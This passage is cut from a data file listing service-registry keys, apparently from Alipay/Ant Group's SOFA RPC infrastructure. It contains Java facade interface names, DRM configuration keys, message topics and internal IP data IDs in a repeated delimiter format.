73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rulemng.common.service.facade.template.RuleBizTemplateService:1.0:promo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.blockchain.mypointsblock.core.service.MsgBrokerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.flux.FinnetOutFluxService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pricecore.common.service.facade.BenchmarkIntRateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.124.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.24.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_M_BATCH_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finstrategy:name=com.alipay.finstrategy.common.service.facadeseven.fixedinvestment.drm.NewSyncControlDrmImpl.contractSyncSwitchJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.250.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_FUND_REDEEMAPPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rinsight.common.base.spi.RinsightListDataRpcSpi:1.0:miniAppVersionQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.DiscountActivityBizService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.lisa.service.eworkcard.EWorkCardGuideService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:imigration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfin.arc.job.processor.core.service.mng.ServingAppManagement:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appstore.common.service.facade.commodity.CommodityPackageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:ucrcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.PortfolioSpManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.AnalyzeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPWorkflowEngineInvokeFacade:1.0:bpWorkflowEngineInvokeFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.operator.facade.IsvOperateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bicocr.common.service.facade.ocr.OcrAlgorithmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_custcenter_transaction_resume#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.clientUpgradeSyncUpgradeSleepTimeDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.common.service.facade.api.monitorbase.ControlComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CONSTRACT-DEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.identity.AccessorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ialicore:name=com.ipay.ialicore.common.drm.MngPageRedirectStrategyDrm.redirectWhiteRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintranscore.common.service.facade.trans.FinPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.AccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepconnector.facade.service.EpDossierServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cspushgw.service.facade.PushMessageService:1.0.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfaccenter.facade.api.SubLedgerTbAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mservicesinspect@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.disease.api.InsDiseaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_send_msg.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmcscore.facade.ActionLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:alipassprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.AccountPreviousInitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.process.ProcessTemplateGrayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbmarketcenter.common.service.facade.activity.service.LotteryActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","zprodmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.common.service.integration.mobilecodec.ShakeCodeFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.punishcenter:name=com.alipay.punishcenter.common.service.facade.ldc.SecurityLdcSwitchResource.switchZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.99.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alcontract.common.service.facade.ContractCoordinatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ioteds.metadata.model.api.EntityMetadataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.api.EventMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:publichome_messageTemplateApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.mng.recon.InfluxReconResultQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.user.api.UserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.ImageProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.122.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.forest.CooperatePlantService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.api.PcreditTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PaybossBizCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.v1.service.DoneResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.moneybox.service.facade.MbFamilyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zskynet.zdalExplorerDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.ny.VoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.pointlibrary.api.PointLibraryQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.feedback.UserFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.AntTargetManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicDeployRecordDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.MessageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scardcenter.common.service.facade.CardModelServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.index.SysinfoNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityLiveFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@rcsmart#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.cif.facade.UserCloseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowPresKademandGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.infosec.InfoSecCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainassetreg.facade.api.penetrate.DcrgAssetPenetrateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchainprod.common.facade.api.product.ProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.uniform.facade.UniformItemEnvSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.apply.AssetApplyDIYQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.ICrowdTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:zmmccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmCCRFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.device.OpenDeviceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.TinyAppJsPermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.theme.ThemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filebridge.service.batch.facade.api.BatchAsynRetryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.UniformModelService:1.0:gwService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.tianFuCardRedPackageText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.trade.prod.schedule.drm.SyncStatusAcceptedOrderDRMResource.batchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antscheduler.facade.IActivityInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.100.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoaftermarket.common.service.common.AutoBizAttachmentFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.merchant.facade.api.RiskLevelQueryService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.bot.facade.clone.BotCloneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:recadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountUnfreezeCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ide.IDEPluginPackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.cmndata.common.service.facade.CommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.promote.InstPromoteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.api.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PRE_AUTH_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchservbase.biz.service.dynamiccode.IotSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:insclaimbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:venuesp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.AddressCodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitypublishcore.common.service.facade.privateplacement.EqianbaoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.agengine.AcnetEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.openapi.BuildSiteFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.112.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.246.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_DATABRIDGE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.QueryAlipayDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.contentWhiteModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.IntelligentAnalyzeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.transferredInstSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.service.facade.merchant.MerchantPassNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.oraclerevcore_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstoperation.core.service.financechannel.base.FinanceChannelBaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmEngineDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.DisplayGoodsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.236.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MY.PIPELINE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.180.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.product.SharedProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsIntegrationCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiPackageSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_instGuarArSPAdjustCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.taskPlatformSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.selectcore.common.service.facade.api.SearchEngineQueryFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.dispense.FrontServiceExtension:1.0:thirdAppStoreFrontServiceDispenseExtension@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.common.service.facade.creditobtain.client.CreditObtainMonitorFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.211.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_1259#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.filefactory.service.facade.FilePlatformAssembleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.SchedulePointFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.limit.SelfCureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.facade.manage.ScriptManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.185.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dqs.common.service.facade.OdpsMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.common.service.facade.api.sendalarm.SendAlarmRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fpdecision.platform.common.service.facade.iface.OfflineSyncFacade:1.0:sitOfflineSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antcloud.infrastructure.facade.environment.ResourceEnvironmentExplorer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.reservation.ReservationConfigQueryInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.punish.LifePunishmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsettle.service.facade.common.api.FundPoolViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.material.CreativeMaterialOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.common.service.facade.dds.api.SqlParseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.asset.api.AssetsAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:addMemberCardExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.explorer.ExplorerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.rcportal.common.lcbc.facade.bc.LcBlockChainRcportalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.ParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:payrouter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.74.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_OFPGROWTH#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:developertool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.SubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.ExchangeRegisterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mshopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.ModelInstanceMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cardbin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_planSendMsgProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcAccessQueryService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.amortization.AssessValueAddAmortizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.25.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_ASYCNTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:gotonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.category.DocQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:inststub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.forest.CharityAccountQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileappcommon.common.service.facade.baas.ProductTemplateConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.tairLatency,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apigw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRelationBizFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:amlcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaRuleSubmitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.facade.api.DataBranchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.AppointmentMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.FileSourceApiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@sdaappdist#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.dchainabsprod.common.facade.api.common.protocol.ProtocolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireBatchOrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.decision.plan.DecisionPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListPubRollBackSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.SocialAdActivityFacade:1.0@DEFAULT#@